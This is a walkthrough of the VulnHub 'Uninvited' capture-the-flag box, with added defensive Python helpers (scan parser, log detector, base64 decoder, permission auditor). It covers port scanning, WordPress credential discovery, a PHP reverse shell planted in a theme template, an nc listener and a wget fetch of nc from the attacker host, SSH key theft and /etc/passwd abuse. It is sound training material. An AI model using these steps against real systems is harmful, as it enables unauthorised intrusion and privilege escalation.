Hack vulnhub — Uninvited

Hussien Almalki
9 min read · Apr 29, 2021

This box (VulnHub release date: 31 Jul 2020) was presented at the VulnHub meetup by Jeevana Chandra.

Let’s get started.

Reconnaissance

Run a full TCP port scan with nmap:

nmap -sS --min-rate 5000 --open -vvv -n -Pn -p- -oG allPorts 192.168.8.161

We get the following result.

Host discovery disabled (-Pn). All addresses will be marked ‘up’ and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-30 00:39 +03
Initiating ARP Ping Scan at 00:39
Scanning 192.168.8.161 [1 port]
Completed ARP Ping Scan at 00:39, 0.05s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 00:39
Scanning 192.168.8.161 [65535 ports]
Discovered open port 80/tcp on 192.168.8.161
Discovered open port 60000/tcp on 192.168.8.161
Discovered open port 7894/tcp on 192.168.8.161
Completed SYN Stealth Scan at 00:39, 1.52s elapsed (65535 total ports)
Nmap scan report for 192.168.8.161
Host is up, received arp-response (0.00051s latency).
Scanned at 2021-04-30 00:39:26 +03 for 1s
Not shown: 65532 closed ports
Reason: 65532 resets
PORT STATE SERVICE REASON
80/tcp open http syn-ack ttl 64
7894/tcp open unknown syn-ack ttl 64
60000/tcp open unknown syn-ack ttl 63
MAC Address: 08:00:27:95:CB:38 (Oracle VirtualBox virtual NIC)
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 1.69 seconds
Raw packets sent: 65536 (2.884MB) | Rcvd: 65536 (2.621MB)

We have three ports open.

  • Port 80
  • Port 7894
  • Port 60000
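The scan above writes its results in greppable form (-oG allPorts), which is the format a practitioner actually scripts against when the same recon is repeated across many hosts. The following parser is an added example, not the author's code: it reads that format, lists the open ports per host, and builds the -p argument for the follow-up scan. The sample allPorts content is constructed from the output above (the real file is not shown in the writeup), with the service column left empty for the two ports nmap's services table does not know.

```python
import re
from typing import Dict, List, Optional, Tuple

# Constructed sample in nmap greppable (-oG) format, modelled on what the
# "nmap -sS ... -oG allPorts" run above would write; not the author's real file.
SAMPLE_OG = (
    "# Nmap 7.91 scan initiated Fri Apr 30 00:39:26 2021 as: nmap -sS --min-rate 5000 "
    "--open -vvv -n -Pn -p- -oG allPorts 192.168.8.161\n"
    "Host: 192.168.8.161 ()\tStatus: Up\n"
    "Host: 192.168.8.161 ()\tPorts: 80/open/tcp//http///, 7894/open/tcp/////, "
    "60000/open/tcp/////\tIgnored State: closed (65532)\n"
    "# Nmap done at Fri Apr 30 00:39:28 2021 -- 1 IP address (1 host up) scanned in 1.69 seconds\n"
)

# "Host: <addr> (<name>)<TAB>Field: value<TAB>Field: value..."
HOST_RE = re.compile(r"^Host: (?P<host>\S+) \((?P<name>[^)]*)\)\t(?P<rest>.*)$")


def parse_port_entry(entry: str) -> Optional[Tuple[int, str, str, str]]:
    """One entry is port/state/protocol/owner/service/rpc info/version/ ;
    the version field may itself contain '/', so it is rejoined."""
    parts = entry.strip().split("/")
    if len(parts) < 7 or not parts[0].isdigit():
        return None
    port, state, proto, _owner, service, _rpc = parts[:6]
    version = "/".join(parts[6:]).strip("/")
    return int(port), state, proto, service or "unknown", version


def parse_grepable(text: str) -> Dict[str, List[Tuple[int, str, str]]]:
    """Return {host: [(port, protocol, service), ...]} for every open port."""
    results: Dict[str, List[Tuple[int, str, str]]] = {}
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if not m:
            continue  # comment lines carry no ports
        # tab-separated "Field: value" pairs; the "Status: Up" line has no Ports field
        fields = dict(f.split(": ", 1) for f in m.group("rest").split("\t") if ": " in f)
        for entry in fields.get("Ports", "").split(","):
            parsed = parse_port_entry(entry)
            if parsed is None:
                continue
            port, state, proto, service, _version = parsed
            if state != "open":
                continue
            results.setdefault(m.group("host"), []).append((port, proto, service))
    return results


def port_list(results: Dict[str, List[Tuple[int, str, str]]], host: str) -> str:
    """Comma-separated open ports, ready for the follow-up scan's -p option."""
    return ",".join(str(p) for p, _proto, _svc in sorted(results.get(host, [])))


if __name__ == "__main__":
    found = parse_grepable(SAMPLE_OG)
    for host, ports in found.items():
        for port, proto, svc in ports:
            print(f"{host} {port}/{proto} {svc}")
    print("nmap -sC -sV -p" + port_list(found, "192.168.8.161") + " 192.168.8.161")
```

Run it against a real allPorts file by reading the file into parse_grepable; the printed command line is exactly the second scan used below.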

Now let's run service and script scans against those three ports.

nmap -sC -sV -p80,7894,60000 -oN targeted 192.168.8.161

We get the following result.

PORT      STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: SEC-CORP
7894/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 af:d2:42:e4:31:ff:4f:fb:0b:de:18:e9:3f:c4:bc:42 (RSA)
| 256 97:56:47:40:ea:99:b2:a6:1a:a5:59:56:7e:2b:b4:a0 (ECDSA)
|_ 256 b2:b1:67:44:75:f6:d8:32:a2:f2:ff:7f:09:a7:7d:53 (ED25519)
60000/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-generator: WordPress 5.4.2
| http-robots.txt: 1 disallowed entry
|_/wp-admin/
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: UNINVITED
MAC Address: 08:00:27:95:CB:38 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Apr 29 23:18:24 2021 -- 1 IP address (1 host up) scanned in 43.16 seconds

We see HTTP on port 80, SSH on port 7894 and another HTTP service (WordPress) on port 60000. Let's explore port 80 first.

Let's open the site in a browser and view the page source.

At the bottom of the source there is an interesting HTML comment:

</footer>  <!-- Footer section end -->  <!--WWVhaCEgSSBrbm93IGl0IGhhcHBlbnMuLi4gSSBndWVzcyB1IG1pZ2h0IHdhbnQgdG8gYWRkIHRoaXMgW2ZpZWxkZm9yY2VdIHRvIHlvdXIgaG9zdHM=-->   <!--====== Javascripts & Jquery ======-->

The comment is a base64-encoded string. Let's decode it:

echo "WWVhaCEgSSBrbm93IGl0IGhhcHBlbnMuLi4gSSBndWVzcyB1IG1pZ2h0IHdhbnQgdG8gYWRkIHRoaXMgW2ZpZWxkZm9yY2VdIHRvIHlvdXIgaG9zdHM=" | base64 -d

We get the following result.

Yeah! I know it happens... I guess u might want to add this [fieldforce] to your hosts

Enumeration

Add the hostname to /etc/hosts:

192.168.8.161    fieldforce

Then fuzz the WordPress site on port 60000 for directories:

wfuzz -c -t 300 --hc=404 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt http://192.168.8.161:60000/FUZZ

We get the following result.

********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.8.161:60000/FUZZ
Total requests: 220560
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000001: 200 323 L 1076 W 22346 Ch "# directory-list-2.3-medium.txt"
000000003: 200 323 L 1076 W 22346 Ch "# Copyright 2007 James Fisher"
000000007: 200 323 L 1076 W 22346 Ch "# license, visit http://creativecommons.org/licenses/by-sa/3.0/"
000000014: 200 323 L 1076 W 22346 Ch "http://192.168.8.161:60000/"
000000013: 200 323 L 1076 W 22346 Ch "#"
000000012: 200 323 L 1076 W 22346 Ch "# on atleast 2 different hosts"
000000006: 200 323 L 1076 W 22346 Ch "# Attribution-Share Alike 3.0 License. To view a copy of this"
000000002: 200 323 L 1076 W 22346 Ch "#"
000000005: 200 323 L 1076 W 22346 Ch "# This work is licensed under the Creative Commons"
000000009: 200 323 L 1076 W 22346 Ch "# Suite 300, San Francisco, California, 94105, USA."
000000008: 200 323 L 1076 W 22346 Ch "# or send a letter to Creative Commons, 171 Second Street,"
000000010: 200 323 L 1076 W 22346 Ch "#"
000000011: 200 323 L 1076 W 22346 Ch "# Priority ordered case sensative list, where entries were found"
000000551: 200 321 L 4211 W 29673 Ch "rss2"
000000004: 200 323 L 1076 W 22346 Ch "#"
000000037: 200 19 L 91 W 1074 Ch "rss"
000000786: 301 9 L 28 W 329 Ch "wp-includes"
000000124: 301 0 L 0 W 0 Ch "0"
000000126: 200 321 L 4211 W 29673 Ch "feed"
000001632: 200 323 L 1076 W 22346 Ch "page1"
000001604: 200 318 L 4201 W 29492 Ch "rdf"
000002024: 301 0 L 0 W 0 Ch "'"
000003790: 301 0 L 0 W 0 Ch "%20"
000006627: 301 0 L 0 W 0 Ch "2020"
000007180: 301 9 L 28 W 326 Ch "wp-admin"
000007815: 302 0 L 0 W 0 Ch "backdoor"

Two of the discovered directories are interesting; wp-admin is the WordPress admin login.

  • wp-admin
  • backdoor

Let's use WPScan to check the target site for known WordPress vulnerabilities and to enumerate vulnerable plugins and users:

wpscan --url "http://192.168.8.161:60000" --enumerate vp,u

We get the following result.

_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.17
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
y
[i] Updating the Database ...
[i] Update completed.
[+] URL: http://192.168.8.161:60000/ [192.168.8.161]
[+] Started: Fri Apr 30 03:48:38 2021
Interesting Finding(s):

[+] Headers
| Interesting Entries:
| - Server: Apache/2.4.38 (Debian)
| - X-Powered-By: PHP/7.4.8
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] robots.txt found: http://192.168.8.161:60000/robots.txt
| Interesting Entries:
| - /wp-admin/
| - /wp-admin/admin-ajax.php
| Found By: Robots Txt (Aggressive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://192.168.8.161:60000/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://192.168.8.161:60000/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://192.168.8.161:60000/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.4.2 identified (Insecure, released on 2020-06-10).
| Found By: Emoji Settings (Passive Detection)
| - http://192.168.8.161:60000/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.4.2'
| Confirmed By: Meta Generator (Passive Detection)
| - http://192.168.8.161:60000/, Match: 'WordPress 5.4.2'
[i] The main theme could not be detected.
[+] Enumerating Vulnerable Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <==============================================================================================================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] elliot
| Found By: Wp Json Api (Aggressive Detection)
| - http://192.168.8.161:60000/wp-json/wp/v2/users/?per_page=100&page=1
[+] Elliot
| Found By: Rss Generator (Aggressive Detection)
[+] 1
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Fri Apr 30 03:48:41 2021
[+] Requests Done: 55
[+] Cached Requests: 5
[+] Data Sent: 11.381 KB
[+] Data Received: 11.159 MB
[+] Memory used: 175.477 MB
[+] Elapsed time: 00:00:02

Username found: elliot

WPScan didn't report any default credentials, so let's look for credentials elsewhere.

Visit the application in the browser.

We can see an interesting note, and when we go back to the source code it points here:

which point <a href="http://www.vulture.com/2015/08/mr-robot-recap-season-1-episode-8.html">wh1ter0se</a> agrees: In 50 hours and 23 minutes, the largest hack ever will commence.</p>

Password found: wh1ter0se

With credentials in hand, let's log in to the admin panel.

Low Shell

We log in to the admin panel and inject malicious PHP code into a WordPress theme.

Log in to the WP dashboard and explore the Appearance tab.

Now go to the Twenty Fifteen theme and choose the 404.php template.

You see a text area for editing the template; inject your malicious PHP code here to obtain a reverse connection from the web server.

To proceed further, we used the PHP reverse shell by Pentestmonkey. We copied the php-reverse-shell into the 404.php WordPress template as shown in the picture below, changed the IP address to our own, entered the port of our choice, and started a netcat listener to catch the reverse connection.

Update the file and browse the following URL to run the injected PHP code.

Next, setup a listener to receive the reverse shell.

nc -lnvp 4444

We get a shell.
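From the defender's side, the steps above leave a recognisable trail in the Apache access log: a visit to the built-in theme editor, a direct request for the edited template file, and, since the WPScan output shows XML-RPC enabled, possible login brute force through xmlrpc.php. The following detector is an added example and not part of the original writeup; the log lines, addresses, the paths it matches and the xmlrpc threshold are constructed assumptions.

```python
import re
from collections import Counter
from typing import Dict, List, Optional

# Apache "combined" log format (the default vhost setting on Debian/Ubuntu).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Built-in file editors: any hit is worth an alert on a site that has them disabled.
EDITOR_PATHS = {"/wp-admin/theme-editor.php", "/wp-admin/plugin-editor.php"}
# Theme templates are included by WordPress, not requested directly by browsers.
THEME_FILE_RE = re.compile(r"^/wp-content/themes/[^/]+/[^/]+\.php$")
# Assumed threshold for calling repeated xmlrpc.php POSTs a brute-force attempt.
XMLRPC_THRESHOLD = 20

# Constructed sample lines (addresses, times and sizes are made up).
SAMPLE_LOG = [
    '10.0.0.5 - - [30/Apr/2021:03:50:01 +0300] "GET / HTTP/1.1" 200 22346 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [30/Apr/2021:03:50:07 +0300] "GET /wp-login.php HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [30/Apr/2021:03:50:12 +0300] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [30/Apr/2021:03:50:40 +0300] "GET /wp-admin/theme-editor.php?file=404.php&theme=twentyfifteen HTTP/1.1" 200 61200 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [30/Apr/2021:03:51:30 +0300] "GET /wp-content/themes/twentyfifteen/404.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
] + [
    f'10.0.0.9 - - [30/Apr/2021:04:00:{i:02d} +0300] "POST /xmlrpc.php HTTP/1.1" 200 370 "-" "python-requests/2.25"'
    for i in range(25)
]


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Split one combined-format line into named fields, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def detect(lines: List[str]) -> List[str]:
    """Return one human-readable finding per suspicious event, in log order,
    with the per-IP xmlrpc count reported after the pass."""
    findings: List[str] = []
    xmlrpc_posts: Counter = Counter()
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        path = rec["path"].split("?", 1)[0]  # drop the query string for matching
        if path in EDITOR_PATHS:
            findings.append(f'{rec["ip"]} opened the WordPress file editor: {rec["path"]}')
        elif THEME_FILE_RE.match(path):
            findings.append(f'{rec["ip"]} requested a theme file directly: {path} (status {rec["status"]})')
        elif path == "/xmlrpc.php" and rec["method"] == "POST":
            xmlrpc_posts[rec["ip"]] += 1
    for ip, n in xmlrpc_posts.items():
        if n >= XMLRPC_THRESHOLD:
            findings.append(f"{ip} sent {n} POSTs to xmlrpc.php (possible credential brute force)")
    return findings


if __name__ == "__main__":
    for finding in detect(SAMPLE_LOG):
        print(finding)
```

Feed the real access.log to detect() line by line. Disabling the built-in editor with the DISALLOW_FILE_EDIT constant in wp-config.php turns the first rule into a zero-tolerance alert, since no legitimate request should reach that page at all.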

Let’s upgrade it to a better shell.

python3 -c 'import pty; pty.spawn("/bin/bash")'

This gives us a partially interactive bash shell. To get a fully interactive shell, background the session (Ctrl+Z) and run the following in your terminal, which tells your terminal to pass keyboard shortcuts through to the remote shell.

stty raw -echo

Once that is done, run the command “fg” to bring netcat back to the foreground. Then use the following command to give the shell the ability to clear the screen.

export TERM=xterm

Unfortunately, we're running as a low-privileged user and can't read the user.txt flag. Therefore, we need to escalate our privileges.

Privilege Escalation

The first thing to do after getting initial access on the box is to enumerate the filesystem for clear-text passwords. While doing that, we found a file named note.txt in /home/demodocker/.local.

Its content is a base64-encoded string. Let's decode it:

echo "ZW5jb2RlZCB0d2ljZSBMUzB0YVhBdExTMHZabk52WTJsbGRIa3VaWGhs" | base64 -d

We get the following result.

encoded twice LS0taXAtLS0vZnNvY2lldHkuZXhl#

The note says it is encoded twice, so let's decode the inner string as well:

echo "LS0taXAtLS0vZnNvY2lldHkuZXhl" | base64 -d

We get the following result.

---ip---/fsociety.exe#
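Both notes on this box (the HTML comment on port 80 and note.txt here) were peeled by hand with base64 -d, and the first echo command was pasted without its trailing '=' padding. The following helper is an added example, not from the original writeup: it decodes nested base64 in one go, repairs dropped padding, and stops as soon as the text no longer looks like base64 or is not printable. The two input strings are the ones from the page; the rule that the next layer is the last whitespace-separated token is an assumption matching how the "encoded twice <blob>" note is laid out.

```python
import base64
import binascii
import re
from typing import List, Optional

# Strict base64 alphabet; '=' padding is optional because pasted strings often lose it.
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")

# The two notes from the writeup. The first is given without its trailing '='
# exactly as it was pasted into the echo command on port 80.
HTML_COMMENT = ("WWVhaCEgSSBrbm93IGl0IGhhcHBlbnMuLi4gSSBndWVzcyB1IG1pZ2h0IHdhbnQgdG8gYWRk"
                "IHRoaXMgW2ZpZWxkZm9yY2VdIHRvIHlvdXIgaG9zdHM")
NOTE_TXT = "ZW5jb2RlZCB0d2ljZSBMUzB0YVhBdExTMHZabk52WTJsbGRIa3VaWGhs"


def pad_b64(s: str) -> str:
    """Restore '=' padding. A valid base64 length is never 1 mod 4."""
    if len(s) % 4 == 1:
        raise ValueError("not a base64 length")
    return s + "=" * (-len(s) % 4)


def decode_once(s: str) -> Optional[str]:
    """Decode one layer; None if it is not base64 or not printable text."""
    s = s.strip()
    if not B64_RE.match(s):
        return None
    try:
        text = base64.b64decode(pad_b64(s), validate=True).decode("utf-8")
    except (ValueError, binascii.Error, UnicodeDecodeError):
        return None
    return text if text.isprintable() else None


def decode_layers(blob: str, max_layers: int = 5) -> List[str]:
    """Peel nested base64 and return every decoded layer in order.
    The last whitespace-separated token of each layer is tried as the next
    layer (assumed layout of the "encoded twice <blob>" note)."""
    layers: List[str] = []
    current = blob
    for _ in range(max_layers):  # bound the loop: untrusted input could nest deeply
        text = decode_once(current)
        if text is None:
            break
        layers.append(text)
        tokens = text.split()
        if not tokens:
            break
        current = tokens[-1]
    return layers


if __name__ == "__main__":
    for name, blob in (("HTML comment", HTML_COMMENT), ("note.txt", NOTE_TXT)):
        for depth, text in enumerate(decode_layers(blob), 1):
            print(f"{name} layer {depth}: {text}")
```

The printability check is what stops the loop on the first note: its last word "hosts" is alphabet-valid but has an impossible base64 length, and a real decoder would otherwise happily turn random words into binary garbage.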

This points to a file, fsociety.exe, served from the web root of the target. Let's download it.

After downloading the file and running it in a Windows environment, it tells us that a reverse connection can be received on port 9999 or 8888.

Let's transfer an nc binary to /tmp on the target.

This can be done by starting a python server on the attack machine.

python3 -m http.server 80

Then download the file into /tmp on the target machine.

wget http://192.168.8.157/nc

Now make the file executable.

chmod +x nc

After that, start a listener on the victim's machine on port 9999 to receive the reverse connection.

Connection successful.

Once we can read the id_rsa file inside the .ssh folder, let's use it to log in over SSH.

After the file is saved, we change the file’s permissions.

chmod 600 id_rsa

Now we connect to the SSH service.

ssh docksec@192.168.8.161 -i id_rsa -p7894

Looking at /etc/passwd, we found that the file is writable by our user, which lets us escalate our privileges and obtain a root account.
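The two permission details above (chmod 600 on the copied id_rsa, and a writable /etc/passwd as the final escalation) are the same class of misconfiguration seen from the defender's side: a sensitive file whose mode is more permissive than it should be. The following audit script is an added example, not part of the original writeup; the policy table and the constructed st_mode values used in the test are assumptions, not data from the box.

```python
import os
import stat
from typing import Dict, Iterable, List, Optional

# Illustrative policy (assumed, not from the box): the most permissive mode
# each file may have. Any extra bit set on the file is reported.
POLICY: Dict[str, int] = {
    "/etc/passwd": 0o644,           # world-readable by design, writable by root only
    "/etc/shadow": 0o640,
    "/etc/sudoers": 0o440,
    "~/.ssh/id_rsa": 0o600,         # ssh refuses private keys readable by others
    "~/.ssh/authorized_keys": 0o644,
}


def check_mode(path: str, st_mode: int, allowed: int) -> Optional[str]:
    """Compare a file's permission bits against the allowed mask; None if fine."""
    perms = stat.S_IMODE(st_mode)          # strip file-type bits, keep rwx/suid/sgid/sticky
    extra = perms & ~allowed
    if not extra:
        return None
    who = []
    if extra & stat.S_IWOTH:
        who.append("world-writable")
    if extra & stat.S_IWGRP:
        who.append("group-writable")
    if extra & (stat.S_IROTH | stat.S_IRGRP):
        who.append("readable by others")
    detail = ", ".join(who) or f"extra bits {extra:04o}"
    return f"{path}: mode {perms:04o} exceeds allowed {allowed:04o} ({detail})"


def audit(modes: Dict[str, int], policy: Dict[str, int] = POLICY) -> List[str]:
    """modes maps a policy path to its st_mode; returns one finding per violation."""
    findings: List[str] = []
    for path, allowed in policy.items():
        if path not in modes:
            continue  # file absent on this host, nothing to judge
        finding = check_mode(path, modes[path], allowed)
        if finding is not None:
            findings.append(finding)
    return findings


def collect_modes(paths: Iterable[str]) -> Dict[str, int]:
    """os.stat each path (expanding ~); files that do not exist are skipped."""
    modes: Dict[str, int] = {}
    for p in paths:
        try:
            modes[p] = os.stat(os.path.expanduser(p)).st_mode
        except FileNotFoundError:
            continue
    return modes


if __name__ == "__main__":
    for line in audit(collect_modes(POLICY)) or ["no findings"]:
        print(line)
```

Separating check_mode from collect_modes keeps the policy testable offline: the same function that would flag the writable /etc/passwd on this box can be exercised with constructed modes before it is dropped onto a fleet.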
